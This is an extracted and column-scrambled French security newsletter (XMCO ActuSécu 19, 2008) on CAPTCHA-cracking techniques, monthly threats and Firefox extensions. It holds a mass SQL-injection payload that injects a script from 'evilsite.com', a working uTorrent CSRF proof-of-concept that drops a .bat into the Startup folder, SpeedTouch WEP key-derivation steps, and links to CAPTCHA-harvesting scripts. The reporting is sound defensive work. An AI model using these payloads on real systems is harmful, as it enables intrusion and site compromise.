spam. En utilisant les adresses IP de serveurs de En effet, le temps ncessaire pour dcoder est un
confiance, les pirates passent ainsi travers ces filtres paramtre galement primordial.
(si aucune autre rgle na t mise en place pour Un algorithme ncessitant 5 secondes avec un taux de
refuser les emails provenant des MX de ces socits). russite de 10% sera, suivant la situation, prfrable
un algorithme permettant de dcoder un Captcha en 1
Voil pourquoi les spammeurs sattaquent aux minute avec un pourcentage de russite de 90%.
Les attaques des CAPTCHA se dveloppent de

mthodes de contournement des CAPTCHA des
webmails et les forums les plus implants. Dans la suite
de cet article, nous vous prsenterons les techniques
utilises par les attaquants. plus en plus et leur efficacit ne cesse de
progresser notamment grce au partage et la
Les CAPTCHA actuels
mise disposition de code sources
Onze annes aprs son invention, les algorithmes de Le CAPTCHA de Microsoft Live Hotmail, rput comme
gnration se sont amliors et diversifis (avec lun des plus robustes, a t rcemment exploit par un
lapparition de captcha audio) afin de contrer les malware (voir la partie dans la suite de larticle). Deux
attaques des pirates. mois auparavant, ctait GMail qui tait la cible
Le CAPTCHA visuel reste le plus utilis, mais son dattaques.
efficacit varie dun algorithme un autre.
Les attaques se dveloppent de plus en plus et leur
Certains CAPTCHA sont donc plus simples casser efficacit ne cesse daugmenter notamment grce au
que dautres. partage et la mise disposition de code source. Ces
attaques ne ncessitent plus dordinateurs puissants.
Les CAPTCHA actuellement utiliss ont tous t casss Les algorithmes dvelopps peuvent prsent casser
avec des taux de russite varis. Cependant, un nimporte quel CAPTCHA en quelques secondes.
algorithme de dcodage ne doit pas tre jug quen
fonction de son pourcentage de russite. Cependant, certains CAPTCHA ne sont pas forcment
vidents, mme pour ltre humain (ci-dessous 2rV2prn
ou 2rV2pm).
Voici les principaux CAPTCHA utiliss actuellement :

LACTU SCU N19
Les diffrentes techniques utilises par les pirates
Plusieurs techniques dattaques ont t labores pour

parvenir contourner cette protection.
La mthode manuelle
Afin dobtenir la chane de caractres correspondant au

CAPTCHA, certains groupes de pirates industrialisent
le procd. Ils emploient des personnes dcodant des Forum utilisant les nouveaux utilisateurs pour dcoder le
CAPTCHA tout au long de la journe. Lattaque est CAPTCHA de Yahoo
compltement manuelle.
De nombreuses annonces sur Internet rmunrent ce Le schma ci-dessus prsente cette technique.
type de travail.
1. Lutilisateur souhaite accder un contenu

Cette annonce rmunre 1$ les 1000 CAPTCHA. Les pornographique ou priv ou poster un commentaire sur
employs travaillent environ 50 heures par semaine en un forum contrl par un spammeur.
fournissant une moyenne de 500 CAPTCHA toutes les
heures. 2. Le site pirate envoie une requte un serveur de
Une solution moins onreuse consiste utiliser les messagerie afin de crer un nouveau compte.
particuliers pour raliser cette tche. Part le biais de
logiciels ou de sites internet, les utilisateurs doivent 3. Une fois la rponse du serveur de messagerie, le site
dcoder un CAPTCHA afin daccder un contenu pirate analyse la page reue pour en extraire le
priv (photos pornographiques, inscription des CAPTCHA.
forums, tlchargement de fichiers).
4. Celui-ci est envoy au particulier. Linternaute est
Le CAPTCHA suivant nest en aucun cas utilis des alors invit dcoder le CAPTCHA.
fins de scurit, mais uniquement pour crer des

comptes email linsu de linternaute. 5. Ce dernier dcode le CAPTCHA et envoie au site
pirate la chane de caractres.
6. Celle-ci est transmise au serveur de messagerie.
7. Si la chane de caractre correspond au CAPTCHA

fourni, un compte Yahoo est cr avec succs et
lutilisateur reoit la ressource convoite, sinon le
processus recommence.
Cette attaque sapparente aux attaques de type MITM

Logiciel utilisant lutilisateur pour dcoder le CAPTCHA de (Man In The Middle).
Yahoo Mail

LACTU SCU N19
La rcupration de CAPTCHA en masse
Dautres spammeurs tentent dautres techniques

dattaques afin de constituer une base de connaissance
INFO...
de toutes les combinaisons possibles. Ces Et les CAPTCHA audio?
rainbowtables (bases exhaustives contenant un
CAPTCHA et sa chane de caractre associe)
permettent ainsi de rduire considrablement le temps Les Captcha audio, moins
rpandus, sont galement la cible
de traitement dun CAPTCHA puisque le calcul a t
dattaques. La chane de caractres
ralis auparavant. saisir est alors pel accompagn
dun bruit de fond. Lutilisateur
En comparant lempreinte du CAPTCHA dcoder doit donc comprendre les lettres
avec celles dtenues en base, le temps de rponse est dictes et soumettre la chane de
de lordre de la milliseconde. caractres correspondante.
Rcupration automatique des CAPTCHA de Yahoo : Dernirement, un code PHP t mis

en circulation, dcodant les captcha
audio anglais des forums SMF (Simple
Machine Forum).
http://securitydot.net/vuln/exploits/
vulnerabilities/articles/24699/
vuln.html
Des scripts sont disponibles dans lobjectif de

rcuprer un grand nombre de CAPTCHA afin de
les traiter par la suite.
Extrait des CAPTCHA rcuprs grce au script

php.
Des scripts rcuprant les CAPTCHA des serveurs

de messagerie les plus importants sont disponibles
depuis les liens suivants :

Yahoo : http://maluc.pastebin.ca/939379
Hotmail : http://maluc.pastebin.ca/939368
Hotmail (Audio) : http://maluc.pastebin.ca/939373
Google : http://maluc.pastebin.ca/939381
Google (Audio) : http://maluc.pastebin.ca/939622

LACTU SCU N19
Lutilisation de la reconnaissance de caractres
La reconnaissance de caractre (OCR), invente en

1953, permet de dterminer le texte contenu dans un
document sous forme dimage. Cette technologie a fait
dnormes progrs ces dernires annes.
Voici les diffrentes tapes ncessaires au dcodage

dun CAPTCHA:
- Suppression du bruit et mise en noir et blanc. Les

pixels parasites sont supprims. Le fond est blanc
tandis que la chane est en noir.
Ce site met disposition une API permettant

dautomatiser les actions sans passer par le site ainsi
- Segmentation. Limage est dcoupe en plusieurs
segments contenant chacun un seul caractre.
INFO...
CAPTCHA KILLER et lextension Firefox...
- Identification de la lettre contenue dans chaque
segment. Le site CAPTCHA killer propose mme un
plugin Firefox. Ce dernier permet en un
clic droit denvoyer le CAPTCHA vers le
serveur qui se chargera via la mthode de
248e2d reconnaissance de caractre de renvoyer
lutilisateur la correspondance. Lors de
nos tests, le taux de russite sest
Des algorithmes permettent ainsi dautomatiser cette lev 80% pour le captcha de Yahoo mais
tche fastidieuse. le temps de traitement tait assez long
La plupart sont payants et se vendent entre 3000$ et (de 25 secondes 4 minutes).
5000$.
Le site CAPTCHA Killer propose ce service

gratuitement.
quun plugin firefox (voir info).

LACTU SCU N19
Des malwares ont galement t dvelopps afin Les CAPTCHA du futur
dautomatiser la cration de comptes depuis les postes Les modles 3D
infects.
Comme nous lavons vu, les CAPTCHA
bass sur la reconnaissance de
caractres sont de plus en plus
contournables. Les CAPTCHA audio,
jugs plus faciles contourner et plus
difficiles implmenter (la prononciation
des lettres est diffrente dans chaque
langue), ne peuvent pas remplacer les
systmes actuels.
Les algorithmes se complexifient de plus

en plus, jusqu rendre limage
ininterprtable pour un humain.
Des algorithmes ont alors dvelopp sur
des modles en 3D.
Ceux-ci, plus efficaces que les CAPTCHA

en 2D ne seront srement pas
implments. En effet, il a t dmontr quils taient
1. Un malware, install sur un poste infect, envoie une
cassables (rotation de limage), mais en un temps
requte un serveur de messagerie afin de crer un
nettement plus important avec des ressources plus
nouveau compte.
performantes.
2. Le malware analyse la page reue par le serveur et
en extrait le CAPTCHA.
3. Le CAPTCHA est envoy au serveur pirate.
4. Le serveur rsout le CAPTCHA ( laide dun outil de

reconnaissance de caractre ou dune personne traitant
chaque requte) et envoie le code au malware.
Reconnaissance dimages
5. Le malware peut alors valider linscription dun
compte ddi au spam enregistr avec lIP dun Microsoft a rendu disponible, en version bta, le projet
particulier. Asirra (Animal Species Image Recognition for
Restricting Access).
6. Le serveur indique si le code transmis est valide.
7. En cas de succs, le malware envoie au serveur

pirate les identifiants gnrs (adresse email, mot de
passe), sinon un nouveau processus denregistrement
est lanc.
De manire gnrale, un poste infect cre une

vingtaine de comptes, afin dviter de blacklister lIP du
poste compromis.

LACTU SCU N19
Ce systme, jug plus simple et plus ludique, demande Conclusion
lutilisateur de slectionner toutes les photos
contenant un chat parmi des photos de chats et de Les algorithmes et les techniques de CAPTCHA
chiens. Ce nouveau systme laisse penser quun actuellement utilises sont tous faillibles. Le
ordinateur ne pourra pas diffrencier un chat dun chien. CAPTCHA na jamais t une protection, mais
http://research.microsoft.com/asirra/ seulement un moyen cens empcher les
spammeurs de polluer les forums et nos boites
Le projet, largement inspir de HotCAPTCHA, a t emails.
jug plus thique. En effet, HotCAPTCHA propose Que peut-on faire aujourdhui pour contrer ces
linternaute de choisir 3 photos parmi 9, celles pirates ?
reprsentant les femmes ou les hommes les plus lheure actuelle, la rponse na toujours pas t
attrayants. trouve. Les futures implmentations des
CAPTCHA devront utiliser des algorithmes
complexes pour que le dcodage et linterprtation
automatique soient plus coteux quun traitement
humain.
Mais peut-on rellement imaginer un algorithme
que seul un humain puisse rsoudre ?
Webographie :
Analyse Captcha :
http://www.w3.org/2004/Talks/0319-csun-m3m/
http://sam.zoy.org/pwntcha/
http://homepages.cs.ncl.ac.uk/jeff.yan/msn_draft.pdf
Cependant, des chercheurs dveloppent ds http://ocr-research.org.ua/index.html
prsent des algorithmes afin de casser ces systmes,
bass sur la reconnaissance de force et de textures. Reconnaissance de formes et de textures : http://
www.cs.berkeley.edu/~fowlkes/project/boundary/
index.html
Reconnaissance de caractres :
http://www.lafdc.com/soft/ocr163.rar
h t t p : / / w w w. b r a i n s - n - b r a w n . c o m / d e f a u l t . a s p x ?
vDir=aicaptcha
Analyse de malwares :
http://securitylabs.websense.com/content/Blogs/
2919.aspx
http://securitylabs.websense.com/content/Blogs/
3063.aspx
http://blog.wintercore.com/?p=11#more-11
Textures disponibles Forme dtermine
http://www.cs.berkeley.edu/~fowlkes/project/boundary/
pb/index.html
http://www.cs.berkeley.edu/~fowlkes/project/boundary/
index.html

LACTU SCU N19
LES MENACES DU MOIS

Tendance de lactivit malicieuse
dInternet :
Lactualit Scurit du mois

dernier a t marque par plusieurs
faits importants.
Injections SQL Massive sur

Internet, publication de
lalgorithme de gnration de clefs
WEP/WPA de certains routeurs,
vulnrabilit Microsoft GDI ou
encore lattaque CSRF permettant de
compromettre un systme via le
logiciel uTorrent.
Dcriptage....
XMCO | Partners
Attaque malicieux hbergeant un code Javascript.

Des iframes, toujours des iframes Plusieurs exploits 8 12) tentent alors d'exploiter une
vulnrabilit du navigateur.
Une attaque de grande envergure a t identifie
durant le mois d'Avril 2008 par plusieurs laboratoires de
CODE
scurit. Depuis deux trois semaines, des milliers
d'applications web ont t attaques par un groupe de
pirates. En effet, prs de 500 000 pages web dont
notamment des sites gouvernementaux (United
Nations, UK Government, US Department of Homeland
DECLARE @T varchar(255),@C varchar(255)
Security) ont t attaqus.
DECLARE Table_Cursor CURSOR
FOR select a.name,b.name from sysobjects
Les pirates ont rutilis la mme technique d'attaque
a,syscolumns b where
qu'il y a plusieurs mois savoir une injection SQL. Un
a.id=b.id and a.xtype='u' and
outil dvelopp cet effet leur a permis de rechercher
(b.xtype=99 or b.xtype=35 or b.xtype=231 or
les pages ASP et ASPX contenant des valeurs
b.xtype=167)
dynamiques telles que des identifiants d'articles ou de
OPEN
produit (article=XXX, productid=XXX) puis tente
Table_Cursor FETCH NEXT FROM Table_Cursor
d'injecter une requte SQL malicieuse (prsente en
INTO @T,@C
partie ci-contre).
WHILE(@@FETCH_STATUS=0) BEGIN
exec('update ['+@T+'] set ['+@C
Cette dernire tente d'identifier tous les champs texte
+']=rtrim(convert(varchar,['+@C+']))+
de la base de donnes sous-jaente puis d'insrer dans
''<script src=http://evilsite.com/1.js></script>''')
les codes sources des pages web une iframe pointant
vers des sites malicieux tels ques nmidahena.com,
FETCH NEXT FROM Table_Cursor INTO @T,@C
aspder.com ou nihaorr1.com.
END
CLOSE Table_Cursor
Ds qu'un internaute visite une des pages infectes, DEALLOCATE Table_Cursor;
son navigateur est alors redirig vers un site web

LACTU SCU N19
A noter : aucune vulnrabilit Microsoft n'a t utilise .wmf (Windows Metafile) et .emf (Windows
pour mener cette attaque. Les pirates ont uniquement E n h a n c e d M e t a fi l e ) c o n t e n a n t d e s e n t t e s
exploit des erreurs de dveloppement (validation de judicieusement conus. La simple ouverture de ces
paramtres). fichiers permettait au pirate de prendre le contrle du
systme.
http://securitylabs.websense.com/content/Alerts/
3070.aspx Une preuve de concept a t publie et montre quil est
h t t p : / / w w w. f - s e c u r e . c o m / w e b l o g / a r c h i v e s / possible darrter le programme
00001427.html explorer.exe (processus grant linterface utilisateur)
http://planet-websecurity.org/Mass+Attack+FAQ/ sous Windows XP et de lancer la calculatrice sous
Windows 2000. Cet exploit cod en C++ gnre un
fichier emf malform qui provoque un dbordement de
mmoire.
fwrite( data, sizeof(data) ,1 , stream ); ===> Cration

du fichier emf
La variable data contient la fois la structure du fichier

emf et le shellcode correspondant calc.exe.
Plus inquitant, Trend Micro vient d'identifier un virus

capable d'exploiter la vulnrabilit GDI. Ce dernier est
dtect par les anti-virus sous le nom de expl_nevar.b
qui fournit une porte drobe lattaquant.
Recherche dans Google : 280 000 pages sont toujours

infectes INFO...
Gnration automatique dexploits?
Plusieurs chercheurs amricains (David

Brumley, Pongsin Poosankam Dawn Song
Jiang Zheng) de l'universit Berkeley
ont publi sur internet un article sur
la possibilit de gnrer
automatiquement des exploits (programme
qui permet d'exploiter une
vulnrabilit).
La mthode est base sur lanalyse

diffrentielle entre un programme
vulnrable et sa version patche. Il
serait alors possible didentifier les
dtails techniques de la vulnrabilit
Page contenant une iFrame vers le site nihaorr1 corrige et par consquent de produire
un exploit pour la version perfectible.
La vulnrabilit GDI (MS08-021) Les premiers essais prouvent que leurs

mthodes fonctionnent. Les rsultats
actuels sur quelques anciennes
Microsoft a publi un correctif de scurit pour une vulnrabilits Microsoft conduisent tous
vulnrabilit dcouverte au sein du module GDI a cration d'un exploit capable de
(Graphics Device Interface). Ce dernier permet provoquer un dni de service.
dafficher les lignes, les courbes et de dessiner sur de
multiples priphriques (crans ou imprimantes). Le cycle de dveloppement dexploit ne
cesse de samliorer ce qui risque de
Nous avons constat depuis quelques semaines une poser de futurs problmes aux
exploitation massive de cette vulnrabilit que ce soit entreprises qui ngligent le 'patch
via la diffusion dun virus ou louverture dun fichier management'.
malform. En effet, ce module prsentait une
vulnrabilit lors du traitement dimages
LACTU SCU N19
Des clefs WEP/WPA prdictibles La gnration du SSID et de la clef WEP/WPA repose
sur plusieurs oprations.
Une information surprenante a t rvle au cours du
mois dAvril. Les chercheurs scurit du groupe 1. La premire consiste supprimer les codes CC et
GNUCITIZEN viennent de dcouvrir un problme PP ce qui nous donne prsent le numro suivant :
important sur plusieurs routeurs du march CP 05 33 UYQ
(SpeedTouch, BT-Home). Ces derniers ont trouv le
moyen de prdire la clef WEP/WPA installe par 2. Les trois derniers caractres sont ensuite convertis
dfaut sur des routeurs Wifi en fonction du SSID!! en hxadcimal ce qui donne :
UYQ --> 555951
Les SSID par dfaut utiliss par la plupart de nos Box
contiennent, en effet, des caractres hexadcimaux. Nous obtenons alors la suite de caractres suivante :
Ces derniers sont gnrs partir dun algorithme CP 05 33 UYQ --> CP0533555951
propre chaque fournisseur.
Enfin, ce dernier chiffre obtenu est chiffr avec
lalgorithme SHA-1 ce qui donne :
5d4bd222bb105a11bfa0bb881e0e2963dea1a2b6
partir de ce numro son extrait les 10 premiers et les

6 derniers chiffres qui correspondent alors la clef
WEP et au SSID
WEP --> 5D4BD222BB
SSID --> SpeedTouchA1A2B6
Aprs une analyse de Reverse Engineering (mthode

qui consiste tudier un produit/technologie en
profondeur pour en dterminer le fonctionnement
interne ou sa mthode de fabrication), ces experts ont
dtermin l'algorithme utilis pour gnrer la clef WEP/
WPA et le SSID de plusieurs routeurs Wifi partir du
numro de srie de l'quipement.
Lopration inverse est maintenant possible si bien
quun simple SSID peut donner la clef WEP/WPA
associeaie.
Petites explications Lalgorithme utilis est compos

de plusieurs oprations ralises partir du numro de
srie de lquipement.
Le numro de srie en question se compose de la

manire suivante :
CP YY WW PP XXX (CC)
YY correspond lanne de construction de

lquipement.(ici 05 correspond lanne 2005).
WW correspond la semaine (ici 33 correspond au
mois dAot).
PP est le code de production (UT).
CC est un code de configuration (25).
Prenons le numro de srie de notre routeur tmoin.
CP 05 33 JT UYQ (25)

LACTU SCU N19
Ces chercheurs ont ainsi pu dvelopper un outil h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 7 6 5 1 / g u i / ?
capable de retrouver les diffrentes clefs WEP/WPA action=setsetting&s=dir_completed_download&v=C:
possibles en fonction du SSID. Les pirates n'ont alors \Documents%20and%20Settings\All%20Users\Start
plus besoin de cracker les clefs mais uniquement de %20Menu\Programs\Startup
lancer une simple ligne de commande...
Enfin, la dernire tape consiste forcer lutilisateur
tlcharger un fichier spcialement conu par exemple
un script .bat. Ce dernier sera excut lors du prochain
dmarrage de la machine
Un pirate peut alors mener une attaque CSRF en

crant une page web contenant plusieurs iframe qui
seront excutes par le navigateur de la victime.
Nous avons test cette vulnrabilit et dvelopp une
page web contenant quelques liens spcialement
conus.
Compromission dune machine via une attaque
CSRF En visitant cette page, la configuration du logiciel
Torrent est alors modifie puis un fichier torrent est
Une vulnrabilit intressante a t rvle par Rob automatiquement tlcharg, puis lanc avec le logiciel
Carter et Billy Rios. En effet, pour la premire fois, une P2P.
vulnrabilit CSRF (envoi de requtes linsu dun
utilisateur) permet de prendre le contrle dune Preuve de concept:
machine.
CODE
Ce type dattaque est gnralement utilis pour
excuter certaines requtes web avec la session de la
victime mais rares sont les vulnrabilits de ce type
qui permettent de compromettre totalement la
machine cible.
<html>
<body>
Cette faille de scurit affecte le logiciel Torrent (client
<p>Poc XMCO Torrent web ui</p>
BitTorrent ultra lger). Ce protocole pair pair (p2p)
permet de transfrer des donnes entre utilisateurs.
<iframe src="http://127.0.0.1:37651/
Ce logiciel particulirement utilis sur Internet est donc
gui/?
vulnrable une attaque de type CSRF. La simple
action=setsetting&s=dir_completed_down
visite dune page web malicieuse permet au pirate de
load_flag&v=1" width="0" height="0"
reconfigurer le logiciel et de prendre le contrle de la
frameborder="0"></iframe>
machine de la victime.
<iframe src="http://127.0.0.1:37651/
gui/?
Le problme en question provient de lextension web
action=setsetting&s=dir_completed_down
UI du client Torrent qui installe un serveur web sur la
load&v=C:\Documents%20and%20Settings
machine locale.
\All%20Users\Start%20Menu\Programs

\Startup" width="0" height="0"
Afin dexploiter pleinement la vulnrabilit Torrent, trois
tapes sont ncessaires (envoi de trois requtes
<iframe src="http://127.0.0.1:37651/
diffrentes).
gui/?action=add-url&s=http://

192.168.10.14/test/
La premire requte va autoriser (paramtre v=1) le
ex.bat.torrent"width="0" height="0"
changement de rpertoire o sont stocks les
tlchargements termins
(dir_completed_download_flag).
</body>

</html>
h t t p : / / 1 2 7 . 0 . 0 . 1 : 3 7 6 5 1 / g u i / ?
action=setsetting&s=dir_completed_download_flag&v=
1
noter: pour que cette attaque soit totalement
La deuxime requte va dfinir un emplacement de transparente pour lutilisateur, ce dernier doit au
destination des fichiers tlchargs. Nous allons ici pralable stre authentifi sur le serveur web. Dans le
choisir le rpertoire contenant les programmes lancs cas contraire, un formulaire dauthentification
au dmarrage de Windows. apparatra.

LACTU SCU N19
OUTILS LIBRES Liste des outils bien utiles
SPECIAL EXTENSIONS FIREFOX

Chaque mois, nous vous
prsentons, dans cette
rubrique, les outils libres
qui nous paraissent utiles et
pratiques.
Ces utilitaires ne sont en

aucun cas un gage de scurit
et peuvent galement tre un
vecteur dattaque.
Nous cherchons simplement

vous faire part des logiciels
gratuits qui pourraient
faciliter votre travail ou
lutilisation quotidienne de
votre ordinateur.
Ce mois-ci se focalise sur

les extensions Firefox
XMCO | Partners
Aprs avoir prsent de nombreux outils libres, nous vous proposons pour les prochains numros, des
extensions Firefox. Ces dernires vous permettront dexploiter pleinement les possibilits du navigateur de
Mozilla.
Ce mois-ci, nous avons choisi de prsenter les extensions suivantes :
BugMeNot : permet de remplir automatiquement les formulaires dauthentification sans avoir senregistrer
sur le site visit.
Firebug : un outil indispensable pour dbugger les applications web.

Web Developer : outils pour dveloppeurs dapplications web.
Switch Proxy : permet de changer rapidement le proxy utilis par votre navigateur.

LACTU SCU N19
BugMeNot
Remplissage de formulaire
Utilit
Type Utilitaire
Description Le site web Bugmenot (prsent dans le N18 de lActuScu)
regroupe un grand nombre didentifiants pour la plupart des sites
dont le contenu est uniquement rserv aux inscrits.
La premire extension que nous vous proposons permet dutiliser

simplement cette base de donnes et de sauthentifier sur la plupart
des sites web via un simple clic droit.
Capture dcran
Tlchargement Lextension BugMeNot est disponible ladresse suivante :

https://addons.mozilla.org/en-US/firefox/addon/6349
Avis XMCO Lextension BugMeNot est devenue indispensable lorsque lon

passe sa journe sur Internet et ravira la plupart dentre vous.
Linscription impose par la plupart des sites dinformations est
souvent longue et fastidieuse. En un simple clic, vous pourrez
dsormais accder sans contrainte la plupart des sites web.

LACTU SCU N19
Firebug
Debugger Web
Utilit
Type Dveloppement web/Dbuggage

Description Firebug est une extension de dbuggage dapplications web.
Directement intgre dans la partie infrieure du navigateur, cet outil
va vous permettre de visualiser chacune des requtes envoyes par
votre navigateur, tudier simplement le code source des pages
HTML et Javascript visites.
Capture dcran
Tlchargement Firebug est disponible ladresse suivante :
https://addons.mozilla.org/fr/firefox/addon/1843
Avis XMCO Firebug est une de nos extensions prfres. Elle inclue notamment
un debuggeur Javascript, une console, un journal dvnements et
un inspecteur de source HTML.
Une des extensions essentielles pour les dveloppeurs et les

consultants!

LACTU SCU N19
WebDevelopper
Outils pour le dveloppement web
Utilit
Type Dveloppement web

Description Toujours dans le mme domaine, Webdevelopper fournit un tas
doutils pratiques pour les dveloppeurs dapplications web.
Dsactivation du Javascript, gestion des cookies, affichage des
commentaires, gestion des CSS et des images...
Tous les outils sont runis pour constituer avec Firebug la mallette
du parfait webmaster.
Capture dcran
Tlchargement WebDeveloper est disponible ladresse suivante :
Avis XMCO WebDeveloper est une extension pratique et simple utiliser. Un
menu sajoute sous la barre dadresse et vous permettra de grer
facilement le dveloppement de vos applications.

LACTU SCU N19
Switch Proxy
Changement de proxy
Utilit
Type Utilitaire
Description SwitchProxy est une extension simple qui a un seul but : vous
permettre de changer rapidement la configuration de votre Proxy et
de sauvegarder plusieurs configurations.
Capture dcran
Tlchargement Lextension Switch Proxy est disponible ladresse suivante :
Avis XMCO Switch Proxy est une extension trs pratique surtout lorsque lon
est amen travailler sur plusieurs sites diffrents. En un clic, il
est alors possible de passer dune configuration une autre sans
avoir passer par longlet Prfrences de Firefox.

LACTU SCU N19
propos de lActuScu
LActuScu est un magazine numrique rdig et dit par les consultants du cabinet de conseil Xmco Partners.
Sa vocation est de fournir des prsentations claires et dtailles sur le thme de la scurit informatique, en toute
indpendance. Il sagit de notre newsletter.
Tous les numros de lActuScu sont tlchargeables ladresse suivante:

http://www.xmcopartners.com/actualite-securite-vulnerabilite-fr.html
propos du cabinet Xmco Partners
Fond en 2002 par des experts en scurit, dirig par ses fondateurs, nous n'intervenons
que sous forme de projets forfaitaires avec engagement de rsultats.
Les tests d'intrusion, les audits de scurit, la veille en vulnrabilit constituent
nos axes majeurs de dveloppement pour notre cabinet.
Paralllement, nous intervenons auprs de Directions Gnrales dans le cadre de

missions daccompagnement de RSSI, dlaboration de schma directeur ou
encore de sminaires de sensibilisation auprs de plusieurs grands comptes franais.
Contacter le cabinet Xmco Partners
Pour contacter le cabinet Xmco Partners et obtenir des informations sur notre mtier : 01 47 34 68 61.
Notre site web : http://www.xmcopartners.com/


XMCO ActuSecu 19 Blackhat

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

XMCO ActuSecu 19 Blackhat

Uploaded by

Copyright:

Available Formats

LACTUSCU 19 XMCO | PARTNERS

DOSSIER SPECIAL BLACKHAT 2008

La mort d e s C A P T C H A: c o m m e n t l e s p i r a t e s a r r i v e n t - i l s c a sser les

L a c t u a l i t d u m o i s : prsentation des vulnrabilits et faits

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

A propos du cabinet Xmco Partners

Pour contacter le cabinet Xmco Partners et dcouvrir nos prestations : http://www.xmcopartners.com/

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

O est le maillon faible...?

Blackhat Amsterdam 2008...........................4 LActualit scurit du mois....................20

La mort des CAPTCHA...............................13 Outils Libres...............................................24

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

BLACKHAT 2008 Rsum des sujets marquants

Dans le monde de la scurit

Petit aperu des confrences

Aprs une introduction mene avec humour et drision

nomm GNUCITIZEN Ethical Hacker. Cette

Pekto a donc choisi de nous rsumer les

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

souvent peu scurise. Lenvoi dun

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

La deuxime partie de laprs-midi fut plus attrayante

Iron Chef Challenge [4] mettait en confrontation deux

M.Ollam, expert dans le domaine, a donc prsent les

Fin de la premire journeplace au cocktail et aux

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Lors de la premire journe, rserve aux

Une vulnrabilit dcouverte au sein du

Microsoft pensait se sortir indemne de

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Lors de la confrence InfoSecurity se

En effet, cette entreprise a ralis

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

La dmonstration sera peut-tre prsente la

Une autre confrence trs attendue tait prsente par

Alors que lon pourrait penser que les INFO...

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Pour les experts, le sujet nest pas

Linjection LDAP se dfinit donc comme

dvelopp pour automatiser lattaque

Cette prsentation aura eu lavantage

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

[2] Attacking Anti-Virus : 0-Day Patch -Exposing Vendors (In)Security

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Biologger - A Biometric Keylogger :

Developments in Cisco IOS Forensics :

URI Use and Abuse :

Antiphishing Security Strategy :

Security Failures in Secure Devices :

Investigating Individuals and Organizations Using

Exposing Vulnerabilities in Media Software :

Hacking Second Life :

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Les attaques contre le CAPTCHA

Depuis quelques mois, les

Introduction leurs campagnes publicitaires de manire automatise.

Le SPAM est devenu, anne aprs anne, un flau qui

derniers sont rapidement identifis en tant que serveurs

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Les attaques des CAPTCHA se dveloppent de

Voici les principaux CAPTCHA utiliss actuellement :

Ce document est la proprit du cabinet XMCO Partners. Toute reproduction est

Plusieurs techniques dattaques ont t labores pour

Afin dobtenir la chane de caractres correspondant au